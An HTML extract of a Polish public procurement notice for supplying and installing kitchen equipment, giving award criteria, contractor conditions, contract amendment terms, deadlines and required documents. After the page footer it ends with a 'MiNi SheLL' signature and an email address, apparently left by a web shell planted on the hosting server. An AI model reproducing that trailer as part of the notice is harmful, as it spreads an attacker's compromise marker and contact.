Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i montaż wyposażenia kuchni. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ oraz w załączniku nr 5 – wzorze umowy. 1. Dostarczony sprzęt/wyposażenie ma być zmontowany/ne i gotowy/e do użycia. Wykonawca ma obowiązek zapewnić protokołu uruchomienia i przeszkolenia użytkowników. 2. Zgodnie z art. 99 ust. 5 Pzp Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych, a wszelkie towary (materiały i urządzenia) określone w opisie przedmiotu zamówienia pochodzące od konkretnych producentów są określone minimalnymi parametrami technicznymi i użytko­wymi, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiają­cego. Wykonawca może powołać się w ofercie na zastosowanie towarów (materiałów i urzą­dzeń) równoważnych opisywanych w specyfikacji warunków zamówienia, składając określo­ny Wykaz to­warów (materiałów i urządzeń) równoważnych wraz z dowodami – dokumenta­mi, o których mowa w pkt 3. W takim przypadku Wykonawca jest obowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia), spełniają określone przez Zama­wiającego wymagania (kryteria równoważ­ności).3. Jeśli w opisie przedmiotu zamówienia zostało wskazane pochodzenie (marka, znak towa­rowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 Pzp, Zamawiający dopuszcza oferowanie ma­teriałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację dostaw oraz zapewnią uzyskanie parametrów technicznych nie gorszych od za­łożonych w wyżej wymienionych dokumentach, tj. w szczególności:3.1.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że określają one minimalne pa­rametry jako­ściowe, cechy użytkowe jakim muszą odpowiadać materiały i urządzenia oferowane przez Wykonawcę. Wykonawca może zaoferować materiały i urządzenia, które spełniają co naj­mniej wszystkie minimalne parametry jakościowe, cechy użyt­kowe. Pod pojęciem „minimal­ne parametry jakościowe i cechy użytkowe” Zamawiają­cy rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie do­stępnych źródłach, katalogach, stronach in­ternetowych producentów.3.2.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że stanowią one wyłącznie wzo­rzec jakościo­wy przedmiotu zamówienia. Wykonawca zawsze może zaoferować ma­teriały lub urządze­nia, które są jakościowo tożsame z opisanym materiałem lub urzą­dzeniem lub są jakościo­wo lepsze.3.3. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowa­nie po­ziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Po­sługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykłado­wy. Zamawiający, wska­zując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie pro­dukty równoważne o parametrach ja­kościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego pro­duktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39141000-2 - Meble i wyposażenie kuchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39141400-6 - Kuchnie do zabudowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określa przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielnie zamówienia.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienie albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia brak podstaw do wykluczenia z postępowania oudzielenie zamówienia wykonawcy musi zostać wykazany przez każdego z wykonawców. Wykonawcy składają oświadczenia potwierdzające brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy. Oświadczenie powinno być złożonewspólnie przez Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami § 11 wzoru umowy: 1. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności. 2. Zakazana jest zmiana postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem zmian wprowadzanych na podstawie art. 455 ustawy Pzp oraz zmian, o których mowa w ust. 3. 3. Strony przewidują następujące rodzaje i warunki zmiany treści umowy: 1) zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonego w § 8 niniejszej umowy. Stawka i kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie odpowiednio do przepisów prawa wprowadzających zmianę stawki podatku VAT, 2) zmiana terminu realizacji przedmiotu zamówienia w przypadku działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie – o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków tego działania, 3) powierzenie Podwykonawcy lub dalszemu Podwykonawcy określonego zakresu prac po uprzednim zaakceptowaniu przez Zamawiającego z jednoczesną zmianą (rozszerzeniem) zapisu § 6 umowy poprzez wprowadzenie do umowy stosownych zapisów dotyczących Podwykonawcy. 4) Zmiana Podwykonawcy, dalszego Podwykonawcy lub rezygnacja z realizacji określonego zakresu zamówienia za pomocą Podwykonawcy lub dalszego Podwykonawcy. Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wyko­nawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wy­kazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest wy­kazać Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodziel­nie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonaw­ca powoływał się w trakcie postępowania o udzielenie zamówienia. Podwykonawcą, na którego zasoby powoływał się Wykonawca w złożonej ofercie, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowa­niu, jest:…………… 4. Zamawiający dopuszcza możliwość dokonania zmian Umowy, jeśli Wykonawcę, któremu Zamawia­jący udzielił zamówienia, ma zastąpić nowy Wykonawca: 1) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian Umowy; 2) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwyko­nawców. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-03-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przy użyciu miniPortalu https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-03-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-04-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy są zobowiązani złożyć następujące dokumenty oraz oświadczenia: 1) Wypełniony i podpisany Formularz oferty - w przypadku składania oferty przez podmioty występu­jące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszyst­kich wykonawców składa­jących ofertę wspólną oraz informację o części za­mówienia, której wykonanie, wyko­nawca zamierza powierzyć podwykonawcom – w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. Uwaga! W informacji należy podać również nazwy (fir­my) podwykonawców, którym zostaną powierzone do wykonania części zamówienia (o ile są już znani na etapie składania ofert). 2) Wypełniony i podpisany „Formularz cenowy – opis przedmiotu zamówienia” 3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warun­ków udziału w postępowaniu zgodnie z art. 125 ust. 1 ustawy Pzp (wg zał. nr 2 do SWZ) aktualne na dzień składania ofert.4) W przypadku zastosowania towarów (materiałów i urządzeń) równoważnych opisywanych w specyfikacji warunków zamówienia wykaz towarów (materiałów i urządzeń) równoważnych wraz z dowodami – dokumentami, o których mowa w pkt. 4.11. SWZ. W takim przypadku Wykonawca jest zobowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia) spełniają określone przez Zamawiającego wymagania (kryteria równoważności).5) Informacja dot. powstania u Zamawiającego obowiązku podatkowego zgod­nie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług.6) W przypadku składania oferty wspólnej:6.1) Oświadczenie, o którym mowa w pkt. 3) Oświadczenie składa każdy z Wykonawców w celu potwierdzenia braku podstaw do wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu (wg zał. nr 2 do SWZ).6.2 ) Oświadczenie Wykonawców, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy (wg. zał. nr 3 do SWZ).6.3) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 6.4 ) Dokumenty i oświadczenia wymienione w pkt. 6.1)-6.2) oraz 6.4)-6.5) Wykonawcy składają wspólnie. 7) W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępnia­jących zasoby – dokumenty wymagane w Rozdziale 8 SWZ.8) Dokumenty potwierdzające, że osoba działająca w imieniu Wykonawcy/Pod­miotu udostępniającego zasoby jest umocowana do jego reprezentacji:8.1) Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewi­dencji i In­formacji o Działalności Gospodarczej lub innego właściwego re­jestru, w celu potwier­dzenia, że osoba działająca w imieniu odpowiednio Wy­konawcy oraz podmiotu udostępniającego zasoby jest umocowana do jego reprezenta­cji chyba, że Wykonawca w Formularzu Oferty (zał. nr 4) wskażę dane umożliwiające dostęp do tych dokumentów samodzielnie przez Zama­wiającego. 8.2 ) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do repre­zentowania wykonawcy oraz podmiotu udostępniającego zasoby – jeżeli w imieniu odpo­wiednio Wykonawcy lub podmiotu udostępniającego zasoby, działa osoba, której umocowa­nie do jego reprezentowania nie wynika z dokum­entów, o których mowa w pkt 8.1) Postanowienia dotyczące pełno­mocnictwa określone w przepisach KC stosuje się odpowiedn­io.8.3) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do repre­zentowania w postępowaniu albo do reprezentowania w postępowaniu i za­warcia umowy, w przy­padku wykonawców wspólnie ubiegających się o udzie­lenie zamówienia zgodnie z art. 58 Pzp (dotyczy również wspólników spółki cywilnej), jeżeli w ich imieniu działa osoba, której umocowanie do reprezentow­ania nie wynika z doku­mentów, o których mowa w pkt 8.1) Posta­nowienie dotyczące pełnomocnictwa określone w przepi­sach Kodek­su Cywilnego sto­suje się odpowiednio.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-03-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com